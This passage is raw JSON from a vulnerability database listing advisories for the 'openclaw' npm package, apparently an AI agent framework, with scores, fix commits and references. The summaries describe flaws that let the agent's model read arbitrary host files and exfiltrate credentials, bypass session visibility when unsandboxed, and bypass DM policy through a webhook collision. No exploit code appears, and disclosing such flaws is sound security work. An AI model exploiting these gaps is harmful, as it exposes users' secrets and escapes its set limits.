ej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41333","GHSA-6p8r-6m93-557f"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x4hn-ygbg-mkep"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90028?format=json","vulnerability_id":"VCID-x794-wfnf-1ugf","summary":"OpenClaw: Self-Whitelisting in appendLocalMediaParentRoots Allows Arbitrary File Read & Credential Exfiltration\n## Summary\nMedia Local Roots Self-Whitelisting in `appendLocalMediaParentRoots` Allows Model-Initiated Arbitrary Host File Read and Credential Exfiltration\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still self-whitelists media parent dirs in src/media/local-roots.ts, but only after config already permits tool-fs root expansion, so the impact is narrower than the default-critical framing.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `1ca4261d7e055d0be141ed79ebb1365d0fbc7364` — 2026-03-30T17:15:03+01:00\n\nOpenClaw thanks @tdjackey for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1ca4261d7e055d0be141ed79ebb1365d0fbc7364","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1ca4261d7e055d0be141ed79ebb1365d0fbc7364"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-57gh-m6rq-54cf","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-57gh-m6rq-54cf"},{"reference_url":"https://github.com/advisories/GHSA-57gh-m6rq-54cf","reference_id":"GHSA-57gh-m6rq-54cf","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-57gh-m6rq-54cf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-57gh-m6rq-54cf"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x794-wfnf-1ugf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89234?format=json","vulnerability_id":"VCID-x7uw-s9a6-fybd","summary":"OpenClaw: `session_status` still bypasses configured `tools.sessions.visibility` for unsandboxed invocations\n## Summary\n`session_status` still bypasses configured `tools.sessions.visibility` for unsandboxed invocations\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real on shipped v2026.3.22: non-sandboxed session_status skipped the shared visibility guard, but this is a same-agent session-policy bypass with unreleased fix, not a broader host-boundary break.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `4d369a3400dc9b737fbe8daa63f09d909ce7beb8` — 2026-03-30T16:48:12+02:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @tdjackey for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4d369a3400dc9b737fbe8daa63f09d909ce7beb8","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/4d369a3400dc9b737fbe8daa63f09d909ce7beb8"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fwjq-xwfj-gv75","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fwjq-xwfj-gv75"},{"reference_url":"https://github.com/advisories/GHSA-fwjq-xwfj-gv75","reference_id":"GHSA-fwjq-xwfj-gv75","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fwjq-xwfj-gv75"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-fwjq-xwfj-gv75"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x7uw-s9a6-fybd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91235?format=json","vulnerability_id":"VCID-x9qg-8qk5-s3d6","summary":"OpenClaw Bypasses DM Policy Separation via Synology Chat Webhook Path Collision\n## Summary\nSynology Chat multi-account configuration could collapse onto a shared webhook path, replacing route ownership and bypassing per-account DM policy separation.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `980940aa58f862da4e19372597bbc2a9f268d70b`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/synology-chat/src/accounts.ts now distinguishes inherited base webhook paths from explicit per-account paths.\n- extensions/synology-chat/src/gateway-runtime.ts now fails closed on inherited or duplicate webhook paths and registers routes without replacement.\n\nOpenClaw thanks @tdjackey for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35635","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13338","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.133","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13342","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35635"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/"}],"url":"https://github.com/openclaw/openclaw/commit/980940aa58f862da4e19372597bbc2a9f268d70b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqp8-q22p-5j9q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35635","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35635"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:10:29Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-path-route-replacement-vulnerability-in-synology-chat"},{"reference_url":"https://github.com/advisories/GHSA-rqp8-q22p-5j9q","reference_id":"GHSA-rqp8-q22p-5j9q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rqp8-q22p-5j9q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1